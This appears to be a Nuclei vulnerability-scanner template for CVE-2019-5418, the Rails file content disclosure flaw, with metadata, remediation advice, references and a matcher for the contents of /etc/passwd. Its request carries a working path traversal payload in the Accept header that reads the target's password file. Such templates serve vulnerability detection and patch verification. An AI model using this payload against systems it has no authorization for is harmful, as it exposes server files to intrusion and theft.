id: CVE-2019-5418 info: name: Rails File Content Disclosure author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. remediation: | Apply the patch provided by the Rails team or upgrade to a version that includes the fix. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2019-5418 - https://www.exploit-db.com/exploits/46585/ - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 cwe-id: CWE-22,NVD-CWE-noinfo epss-score: 0.9746 epss-percentile: 0.99953 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails product: rails tags: cve,cve2019,rails,lfi,disclosure,edb http: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 - 500 # digest: 4a0a0047304502203b5086abecbd23eccb88297db507cc88c35a4941c9a4d66afe5f8883848f8f16022100a08e8a52b681defebbab9738351a090ba58599c20a9e01bd2776bca66cf24893:922c64590222798bb761d5b6d8e72950